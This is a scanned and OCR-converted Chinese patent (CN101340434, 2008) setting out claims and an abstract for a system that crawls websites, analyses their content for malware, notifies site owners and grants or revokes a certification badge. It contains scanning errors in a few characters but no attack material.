      9 、 一種網(wǎng)站惡意內(nèi)容檢測與認(rèn)證系統(tǒng),其用于檢測在目標(biāo)網(wǎng)站上 是否存在惡意內(nèi)容,其特征在于,包括的內(nèi)容進(jìn)行采集;本地數(shù)據(jù)庫,用于存儲由數(shù)據(jù)采集引擎采集到的內(nèi)容;惡意內(nèi)容分析引擎,用于對存儲于所述本地數(shù)據(jù)庫中的內(nèi)容進(jìn)行 分析以檢測其中是否存在惡意內(nèi)容; 認(rèn)證授權(quán)數(shù)據(jù)庫,用于存儲來自惡意內(nèi)容分析引擎的是否存在惡意內(nèi)容的分析結(jié)果;反饋引擎,用于在存在惡意內(nèi)容的情況下,將來自所述惡意內(nèi)容 分析引擎的分析結(jié)果反饋給所述目標(biāo)網(wǎng)站以便目標(biāo)網(wǎng)站對惡意內(nèi)容進(jìn) 4亍相應(yīng)處理;認(rèn)證授權(quán)引擎,用于在不存在惡意內(nèi)容的情況下,對所述目標(biāo)網(wǎng) 站4受予通過認(rèn)i正的標(biāo)志。
      10、 根據(jù)權(quán)利要求9述的系統(tǒng),其特征在于,所述惡意內(nèi)容分析 引擎中包括特征匹配分析單元、智能化啟發(fā)分析單元以及授權(quán)的殺毒 軟件中的至少其中 一種以便對存儲于所述本地數(shù)據(jù)庫中的內(nèi)容進(jìn)行分析。
      11、 根據(jù)權(quán)利要求9或10所述的系統(tǒng),其特征在于,所述惡意 內(nèi)容分析引擎分析的內(nèi)容包括網(wǎng)頁、腳本代碼、軟件、多媒體內(nèi)容和 下載內(nèi)容的至少其中一種。
      12、 根據(jù)權(quán)利要求11所述的系統(tǒng),其特征在于,根據(jù)不同的檢 測等級來選4奪待^^測的內(nèi)容。
      13、 根據(jù)權(quán)利要求9所述的系統(tǒng),其特征在于,所述反饋引擎中 包括E-mail、短信、即時消息發(fā)送單元或電話以便將分析結(jié)果反饋給 所述目標(biāo)網(wǎng)站。
      14、 根據(jù)權(quán)利要求9所述的系統(tǒng),其特征在于,所述認(rèn)證授權(quán)引 擎維護(hù)著認(rèn)證授權(quán)網(wǎng)站,所述認(rèn)證授權(quán)網(wǎng)站與所述認(rèn)證授權(quán)數(shù)據(jù)庫相 聯(lián)系,并且所述通過認(rèn)證的標(biāo)志為包含在目標(biāo)網(wǎng)站中的鏈接到所述認(rèn) 證授權(quán)網(wǎng)站的超鏈接,以便正在訪問目標(biāo)網(wǎng)站的用戶能夠通過點擊該 超鏈接而連接到所述認(rèn)證授權(quán)網(wǎng)站而獲得該目標(biāo)網(wǎng)站的分析結(jié)果從而 確認(rèn)其認(rèn)證授權(quán)狀態(tài)。
      15、 根據(jù)權(quán)利要求14所述的系統(tǒng),其特征在于,用戶利用認(rèn)證 授權(quán)網(wǎng)站查詢所有目標(biāo)網(wǎng)站的認(rèn)證授權(quán)狀態(tài)。
      16、 根據(jù)權(quán)利要求9所述的系統(tǒng),其特征在于,該系統(tǒng)以預(yù)定時 間間隔針對該目標(biāo)網(wǎng)站進(jìn)行惡意內(nèi)容檢測分析,所述認(rèn)證授權(quán)引擎中 還包括認(rèn)證標(biāo)志撤銷單元,在該目標(biāo)網(wǎng)站先前已被授予通過認(rèn)證的標(biāo) 志并且在之后的檢測中發(fā)現(xiàn)其中含有惡意內(nèi)容時,所述認(rèn)證標(biāo)志撤銷 單元招t銷所述通過認(rèn)證的標(biāo)志。
      全文摘要
      本發(fā)明公開了一種網(wǎng)站惡意內(nèi)容檢測與認(rèn)證方法和系統(tǒng),用于檢測目標(biāo)網(wǎng)站中是否存在惡意內(nèi)容,其中數(shù)據(jù)采集引擎以模擬用戶行為的方式來對目標(biāo)網(wǎng)站上的內(nèi)容進(jìn)行采集;本地數(shù)據(jù)庫存儲采集到的內(nèi)容;惡意內(nèi)容分析引擎對存儲下來的內(nèi)容進(jìn)行分析以檢測其中是否存在惡意內(nèi)容;認(rèn)證授權(quán)數(shù)據(jù)庫存儲分析結(jié)果;反饋引擎將存在惡意內(nèi)容的分析結(jié)果反饋給目標(biāo)網(wǎng)站;認(rèn)證授權(quán)引擎在不存在惡意內(nèi)容時對目標(biāo)網(wǎng)站授予通過認(rèn)證的標(biāo)志。利用本發(fā)明能夠?qū)崟r分析用戶訪問目標(biāo)網(wǎng)站時可能接觸到的所有文件,無論其是否存放于該目標(biāo)網(wǎng)站的服務(wù)器上;并且,利用本發(fā)明無需在目標(biāo)網(wǎng)站的服務(wù)器和設(shè)備上安裝任何硬件或軟件,并且不會對目標(biāo)網(wǎng)站服務(wù)器有任何性能上的影響。
      文檔編號H04L29/06GK101340434SQ20081009813
      公開日2009年1月7日 申請日期2008年5月15日 優(yōu)先權(quán)日2008年5月15日
      發(fā)明者瑞 王 申請人:瑞 王
      網(wǎng)友詢問留言 已有0條留言
      • 還沒有人留言評論。精彩留言會獲得點贊!
      1